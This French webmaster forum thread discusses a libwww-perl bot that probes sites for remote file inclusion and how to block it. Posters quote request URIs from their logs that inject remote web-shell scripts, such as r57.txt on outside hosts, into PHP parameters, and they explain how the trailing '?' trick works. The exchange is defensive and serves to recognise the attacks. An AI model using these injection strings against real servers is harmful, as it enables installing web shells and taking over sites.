Libwww-perl 5.69 : qu'elle est ce bot de hacker ?

[marion17]

path=http://www.bhlynx.org/htdig/UPLOADING/full.gif?

==> scanner de vulnerabilité par RFI (remote file inclusion)

en regle generale quand l'extension n'est pas interprétée par le server (full.gif?)
c'est un web shell

et le " ? " coupe la variable d'une possible concatenation dans le path

rog

Ou laj 'ai pas tous comprit

c'est censé faire quoi sur le serveur de vouloir inclure un fichier.gif (qui est en fait un script php avec extention .gif je pense ?

C'est la configuration appache et pas le script php qui est en cause si il y a uen vulnerabilité ?

Un web shell c'est quoi ?

merci

[rog]

un webshell est une script web (php perl python) qui donne acces à une console shell sur le server ou il est uploadé

la vulnerabilité recherchée est bien dans le script

le fichier est gif,dat,cmd,etc.. parce que si il etait en php, le server ou il est hébergé renverrait le code interprété

alors que en gif, il renvoit la source qui va etre interprétée par le server vulnerable

rog

[marion17]

et aller ça recomence, il on changés de site visiblement :

-http://ascnet.by.ru/

url qu'il tente d'injecter :

-index.php?id=http://ascnet.by.ru/cmd/list.txt?

si vous arrivez a farfouiller dans tous ces fichiers dites nous ce que vous trouvez.. moi j'ai pas le temps mais ça me soul déjà ....

ils on vraiment rien d'autre a faire ces voyous...

[Edit kazhar : Inutile de lui faire un lien]

[rog]

lol

y a tous les outils pour rooter un server jusqu'au kernel 2.6.16

rog

[marion17]

lol

y a tous les outils pour rooter un server jusqu'au kernel 2.6.16

rog

houla...

Et pourquoi font t'il ça selon vous ?

pour "s'amuser" ou faire chanter le webmaster avec une rançon, ou autre ?

puis je comprend pas pk il affiche ça sans portection directement sur un domaine...

[iBeb]

Ce matin j'arrive (en retard comme tous les lundis matin) au bureau et regarde mes mails. Sur tous mes sites, j'ai un système d'envoi automatique de mail pour chaque erreur serveur (404, 403 et 401 principalement).
Là au lieu de la dizaine de mails que je retrouve normalement, j'en ai 450 !

et voilà la request_uri : /includes/javascript//includes/orderSuccess.inc.php?glob=1&cart_order_id=1&glob[rootDir]=http://alexen.ru/xpl/r57.txt??
et également :
/includes/javascript//modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://alexen.ru/xpl/r57.txt??

Bien sûr je sais que je n'ai ni de forum ni de caddie virtuel sur mon site, donc je suis rassuré, je sais que ça n'a pas pu aboutir...

Et heureusement, car là encore quand on va à -http://alexen.ru/xpl/r57.txt (n'y allez que si vous avez un anti virus digne de ce nom) on découvre la même chose que guicara en décembre : un sale bête...

et le *** exploite deux failles connues :
- http://www.frsirt.com/bulletins/7239 pour PNphpBB2
- http://www.frsirt.com/bulletins/3370 pour CubeCart

Mais malheureusement, je me sens impuissant ! Qui contacter pour dénoncer un site russe qui tente de pirater un site français ? Quelle action mener sachant que dans moins de 48h, l'url aura changé, et que sa cible sera un tout autre site...
[/url]


[Edit kazhar : Inutile de lui faire un lien; Maitrise tes mots]

[easy_zik]

Vous avez vu ? Y'a un lien direct vers l'URL de ce post sur la page accueil du site !!!

-http://ascnet.by.ru/ (deuxième lien dans le menu de gauche )

[Edit kazhar : Inutile de lui faire un lien !]

[bobw75]

début Aout bot libwww-perl

venant de:
hosting01.incap.ru
80.93.56.0 - 80.93.59.255

avec comme url
/index.php?Language=http://faq (point) matriarchat (point) net/117.txt??

pour moi c'est de la racaille Russe à exclure du .htaccess

[Deus Ex Machina]

Bonjour, désolé du up de ce topic, mais ce bot vient de crawler mon site / forum, j'ai fais un backup de mes bases sql, puisque cela à l'air d'être un bot néfaste que sont les mesures à prendre pour l'exclure via le .htaccess ? Merci pour votre aide.